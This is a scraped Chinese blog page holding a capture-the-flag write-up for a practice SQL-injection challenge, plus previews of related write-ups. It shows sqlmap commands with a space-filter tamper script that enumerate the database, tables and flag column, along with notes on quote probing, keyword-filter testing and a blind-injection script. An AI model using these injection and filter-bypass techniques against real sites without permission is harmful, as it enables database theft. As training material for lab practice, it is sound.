實驗吧 簡單的注sql入 writeup

2021-08-11 12:27:32 字數 661 閱讀 9356

1.輸入id值,通過回顯發現題目應該是進行了空格過濾

2.使用sqlmap進行注入

2.1  python sqlmap.py  -u 「 –random-agent  –tamper=space2comment.py 

–current-db   檢視當前資料庫名稱,返回web1

–current-db –tables 檢視當前資料庫名稱和資料庫裡所有的表

看到web1裡有個flag表,看來key就在裡面

2.3  python sqlmap.py  -u 「 –random-agent  –tamper=space2comment.py

–current-db –tables –columns  看到flag表裡面有個flag列

實驗吧 簡單的SQL注入2

首先輸入1,發現有將資料庫的查詢結果顯示出來 輸入單引號,發現錯誤,這時候可以猜測後台查詢語句 select name from table where id 可以先嘗試萬能密碼 查詢語句就變成 select name from table where id 會把所以結果都顯示出來一共三條記錄 接下...

CTF實驗吧認真一點 SQL盲注

實驗吧位址 很明顯的返回兩個不同得頁面,判斷為sql盲注 並且 過濾了敏感字元 測試的時候還發現過濾了substr 嘗試繞過,返回錯誤頁面 說明 過濾是可以被繞過的 爆庫名長度 import requests str1 you are in url for i in range 1,30 key r...

實驗吧 CTF 簡單的sql注入思路

我們先用單引號測試 頁面錯誤 再加個單引號 頁面正常 那初步判斷語句應該是 select from xx where id 然後我們測試下我們滲透經常用的關鍵字有沒有被過濾 or and select union 1,2,3 information schema.tables information...